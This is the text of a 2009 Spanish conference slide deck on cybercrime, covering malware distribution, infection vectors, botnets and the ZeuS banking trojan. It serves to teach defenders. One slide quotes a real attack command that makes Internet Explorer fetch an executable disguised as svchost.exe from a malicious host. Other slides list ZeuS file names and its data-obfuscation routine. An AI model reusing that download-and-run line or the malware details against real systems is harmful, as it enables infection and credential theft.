Upload
chema-alonso
View
4.388
Download
0
Embed Size (px)
DESCRIPTION
Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.
Citation preview
Confidencialidad
La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización.
Pág. 2
Índice
Pág. 3
Introducción - ¿Cibercrimen?EvoluciónDistribuciónInfecciónBotnets• ZeuS/Zbot
Money, money, money
INTRODUCCIÓN - ¿CIBERCRIMEN?
Pág. 4
¿CIBERCRIMEN?
EVOLUCIÓN (de la mentalidad)
EVOLUCION
1 persona• Ataques dirigidos• Recursos limitados
Grupos profesionales• Ataques indiscriminados/masivos• Muchos recursos técnicos
EVOLUCIÓN
Cambio de objetivos
Inicios: Ataques al servidor• Necesidad de pocos recursos• Mayor conciencia de seguridad
Ahora: Ataque a los clientes• Necesidad de manejar mucha
información• Necesidad de una infraestructura
tecnológica• Poca conciencia de seguridad
EVOLUCIÓN
1 servidor• Búsqueda de vulnerabilidades• Atacante trata de acceder al servidor
N clientes• Vulnerabilidades conocidas• Victima accede al vector de infección• ¿Phishing? → Malware!!!
DISTRIBUCIÓN
DISTRIBUCIÓN
El malware acude a la víctima• SPAM
• Búsqueda y robo de contactos• P2P• Ingeniería social• Descargas con “regalo”
EJ. SPAM
EJ. SPAM
DISTRIBUCIÓN
La víctima acude al malware• Páginas fraudulentas
• Falsos antivirus• Falsas páginas de vídeos
• Páginas comprometidas• Páginas legítimas atacas
indiscriminadamente
EJ. FAKE AV
EJ. FAKE AV
DISTRIBUCIÓN
Página comprometida, ¿cómo?• Nine ball: 40000 páginas
comprometidas• Cuentas FTP• Diccionario/Brute force• SQL injection• RFI• Exploits recientes, 0-days
SQL INJECTION MASIVO
INFECCIÓN
INFECCIÓN
INFECCIÓN
Software vulnerable• Sistema Operativo• Navegador• Complementos
• Flash• PDF...
TODO programa que interactúe con el exterior es una POSIBLE víctima.
UNAS ESTADÍSTICAS... [secunia]
INFECCIÓN
INFECCIÓN
Víctima “vulnerable”• Ejecución de ficheros adjuntos• Doble extensión (.doc______.exe)
Confianza en la página• Codecs
No siempre se está a salvo teniendo todo el software actualizado• 0-days• Ventana de tiempo de los antivirus
INFECCIÓN
Microsoft DirectShow 0-day (msvidctl.dll)
• Páginas comprometidas
• Inyecta 8oy4t.8866.org/aa/go.jpg
• Muchos exploits, entre ellos el 0day
• 2000, 2003 y XP vulnerables
• Ejecuta: C:\[%programfiles%]\Internet Explorer\iexplore.exe "http://milllk.com/wm/svchost.exe"
• Detectado por solamente por 2 AV (VirusTotal)
• Por ahora, v0.1http://www.securityfocus.com/bid/35558http://www.csis.dk/en/news/news.asp?tekstID=799http://www.microsoft.com/technet/security/advisory/972890.mspx
INFECCIÓN
La cadena es tan fuerte como el eslabón más débil
BOTNETS
BOTNETS
BOTNETS
BOTNETS
Uso:• Proxy• Ataques DdoS• Obtención de credenciales• Hosting• SPAM• Supercomputadora• ...
BOTNETS
No solo PCsBotnets ocultas tras Bullet-proof ISP• No responden a avisos de abuso• Alojan paneles de control• Alojan vectores de infección y
malware• Fraudulento
TROYANOS BANCARIOS - ZeuS
TROYANOS BANCARIOS
SilenciososDistribución masivaBotnetRobar credencialesMitB¿Por qué no más? ¡Es gratis!• Control de la máquina• Proxy• …
Programado por humanos• Parámetros• Idioma, user-agent...
TROYANOS BANCARIOS
Actores• Sinowal
• Torpig• Buena ocultación• Generación de dominios mediante
algoritmo• Arrestos
• BankPatch• MitB
• ZeuS• Más sencillo• Ocultación user-mode• ¡El rey del mambo!
ZEUS
Finales 2006
• Simple bot
• ~3000$Principios 2007
• Se hace popular
• ~700$Finales 2007
• Versiones personalizadasMediados 2008
• Vulnerabilidades
• Implementaciones en paralelo2009
• Vulnerabilidades corregidas
• Soporta parcialmente IPv6...
ZEUS – CAMBIOS IMPORTANTES
Corrección de bugs• Mal saneamiento de parámetros
• Escritura de ficheros• ¡Guerra!
10-12-2008 → RC4• Local data requests to the server
and the configuration file can be encrypted with RC4 key depending on your choice
ZEUS
ZEUS
Distribución• SPAM
• Facturas• E-cards• Michael Jackson
• Kits de exploits
ZEUS - CARACTERÍSTICAS
BotActualización configuraciónActualización del binario/etc/hostsSocks proxyInyección HTMLRedirección HTMLCapturas de pantallaCapturas de teclados virtualesCaptura de credencialesRobo certificadosKillOS
ZEUS - TODO
Compatibility with Windows Vista and Windows 7Improved WinAPI hookingRandom generation of configuration files to avoid generic detectionConsole-based builderVersion supporing 64 bit processorsFull IPv6 supportDetailed statistics on antivirus software and firewalls installed on the infected machines
ZEUS
ZEUS - FICHEROS
1.0.x.x
• ntos.exe
• \wnspoem\audio.dll
• \wnspoem\video.dll……1.2.x.x
• sdra64.exe
• \lowsec\local.ds
• \lowsec\audio.ds¿1.3.x.x?
• bootwindows.exe
• \skype32\win32post.dll
• \skype32\win64post.dll
ZEUS
ZEUS
ZEUS
Config file:• Cifrado con RC4• Update binary• Url C&C server• Advanced configuration• Webfilters• WebFakes• WebInjects
ZEUS
Ficheros de datos• Cifrado RC4 al servidor• Cifrado.
For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
ZEUS - C&C
ZEUS - C&C
Instalación: • Siguiente → Siguiente → Final
PHP + mysql • O ficheros
Generador de ficheros de configuración y binarios.Opciones del panel de control
ZEUS - C&C
Instalación: • Siguiente → Siguiente → Final
PHP + mysql • O ficheros
Generador de ficheros de configuración y binarios.Opciones del panel de control
Zeus – C&C
Opciones• Botnet : Bots online• Botnet : Comandos remotos• Logs : Búsqueda• Logs : Ficheros subidos• System : Perfil• System : Opciones
ZEUS
ZEUS
KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la
memoria.• BSOD
ZEUS
KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la
memoria.• BSOD
MONEY, MONEY, MONEY
LUCRO
Crear malware y venderloCrear botnet y alquilarlaObtención de credenciales y venderlasObtención de dinero gracias a las credenciales
LUCRO
LUCRO
LUCRO
LUCRO
LUCRO
TransferenciasCompra de bienes• Físicos• Virtuales
Subastas...deja volar tu imaginación
*[ MUCHAS GRACIAS ]
Pág. 61